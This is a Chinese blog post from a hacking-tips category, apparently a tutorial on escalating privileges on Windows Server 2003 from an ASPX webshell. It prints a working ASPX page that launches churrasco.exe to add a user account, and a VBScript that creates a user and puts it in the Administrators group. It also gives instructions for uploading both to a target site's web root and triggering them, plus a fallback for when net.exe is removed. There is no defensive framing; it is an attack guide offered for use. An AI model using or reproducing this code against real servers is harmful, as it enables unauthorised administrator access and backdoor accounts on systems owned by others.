纵有疾风起
人生不言弃
首页 > 博客 > 黑客攻防 > 正文

Aspx下03系统0day的提权方法 – 网站安全 – 自学php

2020-10-10 分类:黑客攻防 阅读(295) 评论(0) 扫描二维码 隐藏侧边

 使用 Aspx下03系统0day的提权方法的提权成功率非常高.可是需要满足一下条件
        1.webshell支持aspx
        2.能执行cmd命令
        3.系统盘有可写可读目录
        需要使用到的工具有 
        1.churrasco.exe 或者 pr.exe
        2.0day.aspx
        3.adduser.vbs
        下面是.0day.aspx的代码

  

<%@ Page Language="C#" Debug="true" trace="false" validateRequest="false"%>
<%@ import Namespace="System.IO" %>
<%@ import Namespace="System.Diagnostics" %>
<%@ import Namespace="System.Data" %>
<%@ import Namespace="System.Data.OleDb" %>
<%@ import Namespace="Microsoft.Win32" %>
<%@ import Namespace="System.Net.Sockets" %>
<%@ Assembly Name="System.DirectoryServices, Version=2.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A" %>
<%@ import Namespace="System.DirectoryServices" %>
<%
System.Diagnostics.Process myP = new System.Diagnostics.Process();
myP.StartInfo. 
RedirectStandardOutput = true;
myP.StartInfo.FileName=Server.MapPath("churrasco.exe");
myP.StartInfo.UseShellExecute = false;
myP.StartInfo.Arguments= " \"net user 用户 密码 /add\" ";
myP.Start();
string output = myP.StandardOutput.ReadToEnd();
Response.Write(output);
%>

使用方法:

        1.修改0day.aspx脚本中需要添加的帐号和密码 
        myP.StartInfo.Arguments= ” \”net user 用户 密码 /add\” “;
        2.上传churrasco.exe和0day.aspx到网站的程序目录
        3.然后在浏览器访问0day.aspx文件

 比如 目标沾站点是 www.exehack.net  0day.aspx上传到了网站根目录
         那么我们直接访问http://www.exehack.net/ 0day.aspx 即可添加了帐号密码。 然后没有添加即不可用。

 

如果前面的方法提权不成功,那么有可能是管理员将net net1删除或者没有权限 那么即可用到以下方法:
        这里要用到一个vbs的脚本 脚本代码如下

  

set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os)
Set oe=GetObject(os&"/Administrators,group")
Set od=ob.Create("user","用户名")
od.SetPassword "密码"
od.SetInfo
Set of=GetObject(os&"/用户",user)
oe.add os&"/用户"

这里还是需要修改一些自己设置的用户名和密码。

然后还需要将来下ASPX oday代码里面的

        myP.StartInfo.Arguments= ” \”net user 用户 密码 /add\” “;
        修改为:
        myP.StartInfo.Arguments= ” \”adduser.vbs的绝对路径\” “; 
        比如路径是C:\Inetpub\wwwroot\adduser.vbs 注意:这里修改把绝对路径中的\ 修改为 /
        比如 C:/Inetpub/wwwroot/adduser.vbs
        然后最后的修改结果就是
        myP.StartInfo.Arguments= ” \”C:/Inetpub/wwwroot/adduser.vbs\” “;
        全部修改完成以后 还是在浏览器访问0day.aspx文件

        
         这里需要注意的是,这种方法细节非常重要 如果大家测试没成功可以根据以上方法多尝试几次。

 

 
    上一篇: webshell写入启动项目提权 – 网站安全 – 自学php

    下一篇: php is_numberic函数安全吗 – 网站安全 – 自学php

AD:【更多看点】学生“冒死”偷拍老师,当看到最后一个,网友:这谁能顶得住

 收藏 (0)
未经允许不得转载:起风网 » Aspx下03系统0day的提权方法 – 网站安全 – 自学php
分享到: 生成海报
标签:

825e5b70b68d744d

相关推荐

评论 抢沙发

评论前必须登录!

立即登录